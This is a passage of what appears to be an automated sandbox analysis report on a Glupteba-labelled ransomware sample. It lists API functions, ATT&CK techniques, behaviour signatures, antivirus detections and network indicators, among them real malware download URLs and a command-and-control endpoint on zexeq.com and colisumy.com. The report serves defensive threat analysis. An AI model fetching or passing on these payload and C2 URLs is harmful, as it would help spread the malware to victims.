                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,0_2_004A884E
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,0_2_004A7BB3
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,0_2_004A7E27
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_004A7E83
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_004A7F00
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_004A7F83
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_004A8178
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_004B0116
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004A82A2
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_004A834F
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_004A8423
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,2_2_004A87C8
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,2_2_004A884E
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_004A7BB3
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,2_2_004A7E27
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_004A7E83
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_004A7F00
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_004A7F83
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_00E58178
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00E60116
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00E582A2
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_00E5834F
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,3_2_00E58423
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,3_2_00E587C8
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,3_2_00E5884E
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,3_2_00E57BB3
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00E57E83
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,3_2_00E57E27
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_00E57F83
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_00E57F00
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_00E58178
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00E60116
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00E582A2
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,_GetPrimaryLen,4_2_00E5834F
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,4_2_00E58423
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,4_2_00E587C8
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: GetLocaleInfoW,4_2_00E5884E
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,4_2_00E57BB3
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00E57E83
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: EnumSystemLocalesW,4_2_00E57E27
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_00E57F83
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_00E57F00
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004A2283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004A2283
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00489F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0049FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0049FE47
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00489F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Native API
                1
                Registry Run Keys / Startup Folder
                11
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                OS Credential Dumping2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium2
                Data Encrypted for Impact
                CredentialsDomainsDefault Accounts3
                Command and Scripting Interpreter
                1
                Services File Permissions Weakness
                1
                Registry Run Keys / Startup Folder
                2
                Obfuscated Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness
                1
                Masquerading
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
                Virtualization/Sandbox Evasion
                NTDS24
                System Information Discovery
                Distributed Component Object ModelInput Capture13
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Process Injection
                LSA Secrets1
                Query Registry
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Services File Permissions Weakness
                Cached Domain Credentials151
                Security Software Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1381448 Sample: baaf76a5d567125252c32a83436... Startdate: 26/01/2024 Architecture: WINDOWS Score: 100 35 zexeq.com 2->35 37 colisumy.com 2->37 39 api.2ip.ua 2->39 45 Snort IDS alert for network traffic 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Found malware configuration 2->49 51 8 other signatures 2->51 7 baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe 1 17 2->7         started        12 baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe 14 2->12         started        14 baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe 13 2->14         started        16 baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe 2->16         started        signatures3 process4 dnsIp5 43 api.2ip.ua 104.21.65.24, 443, 49729, 49730 CLOUDFLARENETUS United States 7->43 33 baaf76a5d567125252...3d7545b_payload.exe, PE32 7->33 dropped 55 Found stalling execution ending in API Sleep call 7->55 57 Writes a notice file (html or txt) to demand a ransom 7->57 59 Writes many files with high entropy 7->59 18 baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe 1 23 7->18         started        23 icacls.exe 7->23         started        61 Multi AV Scanner detection for dropped file 12->61 file6 signatures7 process8 dnsIp9 41 zexeq.com 199.59.242.150, 49731, 49732, 49734 BODIS-NJUS United States 18->41 25 C:\Users\user\...\wctF86A.tmp.vapo (copy), MS-DOS 18->25 dropped 27 C:\Users\user\...\wctF411.tmp.vapo (copy), data 18->27 dropped 29 C:\Users\user\...\wctEA40.tmp.vapo (copy), data 18->29 dropped 31 42 other files (40 malicious) 18->31 dropped 53 Modifies existing user documents (likely ransomware behavior) 18->53 file10 signatures11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe87%ReversingLabsWin32.Trojan.Glupteba
                baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe76%VirustotalBrowse
                baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe100%AviraHEUR/AGEN.1319085
                baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe87%ReversingLabsWin32.Trojan.Glupteba
                C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe76%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLink
                zexeq.com21%VirustotalBrowse
                colisumy.com20%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://colisumy.com/dl/build2.exe$run100%URL Reputationmalware
                http://zexeq.com/files/1/build3.exe$run100%URL Reputationmalware
                http://zexeq.com/raud/get.php100%URL Reputationmalware
                http://colisumy.com/dl/build2.exe100%URL Reputationmalware
                http://zexeq.com/raud/get.phpep100%URL Reputationmalware
                http://www.wikipedia.com/0%URL Reputationsafe
                http://zexeq.com/files/1/build3.exe100%URL Reputationmalware
                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                http://zexeq.com/raud/get.phpP100%Avira URL Cloudmalware
                http://colisumy.com/dl/build2.exerun00.Y100%Avira URL Cloudmalware
                https://api.b?0%Avira URL Cloudsafe
                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0100%Avira URL Cloudmalware
                https://we.tl/t-tnzomMj60%Avira URL Cloudsafe
                http://zexeq.com/raud/get.phpP18%VirustotalBrowse
                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637V100%Avira URL Cloudmalware
                https://we.tl/t-tnzomMj6KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==0%Avira URL Cloudsafe
                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637i100%Avira URL Cloudmalware
                https://we.tl/t-tnzomMj60%VirustotalBrowse
                http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637100%Avira URL Cloudmalware
                http://zexeq.com/files/1/build3.exerun8100%Avira URL Cloudmalware
                https://we.tl/t-tnzomMj6HU0%Avira URL Cloudsafe
                https://we.tl/t-tnzomMj6HU0%VirustotalBrowse
                http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe016%VirustotalBrowse
                http://zexeq.com/files/1/build3.exerun817%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.2ip.ua
                104.21.65.24
                truefalse
                  high
                  zexeq.com
                  199.59.242.150
                  truetrueunknown
                  colisumy.com
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truetrue
                  • Avira URL Cloud: malware
                  unknown
                  http://zexeq.com/raud/get.phptrue
                  • URL Reputation: malware
                  unknown
                  https://api.2ip.ua/geo.jsonfalse
                    high
                    http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637true
                    • Avira URL Cloud: malware
                    unknown
                    http://zexeq.com/files/1/build3.exetrue
                    • URL Reputation: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.b?baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://zexeq.com/raud/get.phpPbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://colisumy.com/dl/build2.exerun00.Ybaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://colisumy.com/dl/build2.exe$runbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    unknown
                    https://api.2ip.ua/geo.json/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://www.amazon.com/baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934779392.0000000004120000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        https://api.2ip.ua/geo.json)baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).30264859306.ttf.2.dr, 37262344671.ttf.2.drfalse
                            high
                            http://zexeq.com/files/1/build3.exe$runbaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 